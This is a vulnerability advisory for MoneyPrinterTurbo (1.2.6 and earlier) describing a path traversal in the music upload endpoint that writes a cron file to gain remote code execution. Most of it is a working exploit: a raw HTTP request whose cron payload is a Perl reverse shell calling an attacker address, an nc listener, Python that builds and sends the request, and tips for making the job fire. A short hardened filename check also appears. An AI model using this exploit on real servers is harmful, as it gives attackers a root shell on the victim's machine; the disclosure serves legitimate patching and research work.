BUG_Author: xuanSAMA
Affected Version: MoneyPrinterTurbo ≤ 1.2.6
Vendor: MoneyPrinterTurbo GitHub Repository
Software: MoneyPrinterTurbo
Vulnerability Files:
app/controllers/v1/music.py

Description:
In app/controllers/v1/music.py, the upload_music function handles file uploads to the /api/v1/musics endpoint. The function accepts a filename parameter from a multipart/form-data request. This user-controlled filename is not sanitized for path traversal sequences (../).

An attacker can send a POST request with a malicious filename containing "dot-dot-slash" (../) sequences. This allows them to write a file to an arbitrary location on the server's filesystem, outside of the intended upload directory. The application only checks whether the filename ends with "mp3"; this is a plain suffix match, not an extension check, so it is satisfied by a name such as evil.mp3 or, as in this case, 1mp3 (no dot at all).

By writing the file into a location that the system executes automatically (e.g., /etc/cron.d/), an attacker can execute arbitrary commands. The name 1mp3 is chosen deliberately: on Debian-based systems cron applies the run-parts naming rule to /etc/cron.d and ignores files whose names contain characters other than letters, digits, underscores and hyphens, so evil.mp3 would pass the application's check but never be scheduled. For this specific vector to succeed, the cron daemon must be installed and running on the target server to process the malicious file, and the application process must be allowed to write into /etc/cron.d (normally this means it runs as root).

Prerequisite: The cron daemon (cron/crond) must be installed and running on the target server. The exploit relies on this service to execute the scheduled payload.
Proof of Concept:
Start a listener on the attacker's machine to catch the reverse shell. The port should match the one specified in the payload (e.g., port 80).
nc -lvnp 80
Use a tool like curl to send the following POST request to the target server, replacing <target-ip>:<port> with the application's address and <attacker-ip> with the listener's IP address.
POST /api/v1/musics HTTP/1.1
Host: <target-ip>:<port>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBXzYq0O8O6IOvAV5
User-Agent: Mozilla/5.0
Connection: close
Content-Length: 497

------WebKitFormBoundaryBXzYq0O8O6IOvAV5
Content-Disposition: form-data; name="file"; filename="../../../../../etc/cron.d/1mp3"
Content-Type: application/octet-stream

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="<attacker-ip>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
------WebKitFormBoundaryBXzYq0O8O6IOvAV5--
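The following Python example is added here for illustration and is not code from the MoneyPrinterTurbo project or from the original report. It serves two purposes: it reconstructs the unsafe pattern the description above attributes to upload_music (a bare "mp3" suffix check followed by a raw join of the client-supplied filename) beside a hardened version of the same check, and it builds the PoC request shown above with a computed Content-Length instead of a hard-coded one. The upload directory (MUSIC_DIR), the function names, and the exact shape of the vulnerable handler are assumptions; the endpoint, the traversal filename and the Perl payload are taken from the report.

```python
import posixpath
import socket

# Constructed values for this example. The real project's upload directory and
# handler internals are not given on the page; MUSIC_DIR is an assumption.
MUSIC_DIR = "/app/resource/songs"
TRAVERSAL_NAME = "../../../../../etc/cron.d/1mp3"
BOUNDARY = "----WebKitFormBoundaryBXzYq0O8O6IOvAV5"


def unsafe_target_path(filename: str) -> str:
    """Reconstruction (hypothetical) of the pattern the advisory describes:
    only the suffix is checked, then the raw client-supplied name is joined
    onto the upload directory. Returns the normalised path a write would hit."""
    if not filename.endswith("mp3"):
        raise ValueError("only mp3 files are accepted")
    return posixpath.normpath(posixpath.join(MUSIC_DIR, filename))


def safe_target_path(filename: str) -> str:
    """Hardened equivalent: drop any directory component, require a real
    '.mp3' extension, and confirm the resolved path is still inside MUSIC_DIR."""
    base = posixpath.basename(filename.replace("\\", "/"))
    if base in ("", ".", "..") or not base.lower().endswith(".mp3"):
        raise ValueError("invalid filename")
    target = posixpath.normpath(posixpath.join(MUSIC_DIR, base))
    # Defence in depth: basename() already removed traversal, but re-check so a
    # later refactor that keeps directory components cannot silently regress.
    if posixpath.commonpath([MUSIC_DIR, target]) != MUSIC_DIR:
        raise ValueError("path escapes upload directory")
    return target


def build_upload_request(host: str, attacker_ip: str, port: int = 80):
    """Builds the PoC request from the report as (header text, body bytes).
    The cron line is the Perl reverse shell from the page; a trailing newline is
    appended because cron rejects a cron.d file whose last line is unterminated,
    and the CRLF before the closing boundary belongs to the multipart delimiter,
    not to the file content."""
    cron_line = (
        "*/1 * * * * root /usr/bin/perl -e 'use Socket;$i=\"%s\";$p=%d;"
        "socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));"
        "if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");"
        "open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\n"
        % (attacker_ip, port)
    )
    body = (
        f"--{BOUNDARY}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{TRAVERSAL_NAME}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
        f"{cron_line}\r\n"
        f"--{BOUNDARY}--\r\n"
    ).encode()
    headers = (
        "POST /api/v1/musics HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Connection: close\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    )
    return headers, body


def send_upload_request(target_host: str, target_port: int, attacker_ip: str) -> bytes:
    """Sends the PoC over a raw TCP socket and returns the server's response.
    Not invoked at import time; call it explicitly against a test instance."""
    headers, body = build_upload_request(f"{target_host}:{target_port}", attacker_ip)
    with socket.create_connection((target_host, target_port), timeout=10) as s:
        s.sendall(headers.encode() + body)
        return s.recv(4096)
```

unsafe_target_path resolves the report's filename to /etc/cron.d/1mp3 because posixpath.normpath discards the "../" components that climb above the filesystem root, which is exactly what a real write would do. safe_target_path reduces the same input to the bare name 1mp3 and then rejects it for lacking a ".mp3" extension; a name such as "../../etc/cron.d/1.mp3" is accepted but stored only as /app/resource/songs/1.mp3.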
Verifying the Exploit:
Once the request has been sent, the file /etc/cron.d/1mp3 exists on the server. Because cron is running, it will read the new file and schedule the job. Within one minute, the job will trigger, executing the Perl reverse shell. The netcat listener will receive an incoming connection, providing a shell on the compromised server. This confirms successful arbitrary file write and remote code execution. If the file is written but the job never fires, check that the file ends with a newline and that its name contains no dot: cron skips a cron.d file whose last line is unterminated, and on Debian-based systems it ignores cron.d file names that do not follow the run-parts naming rule.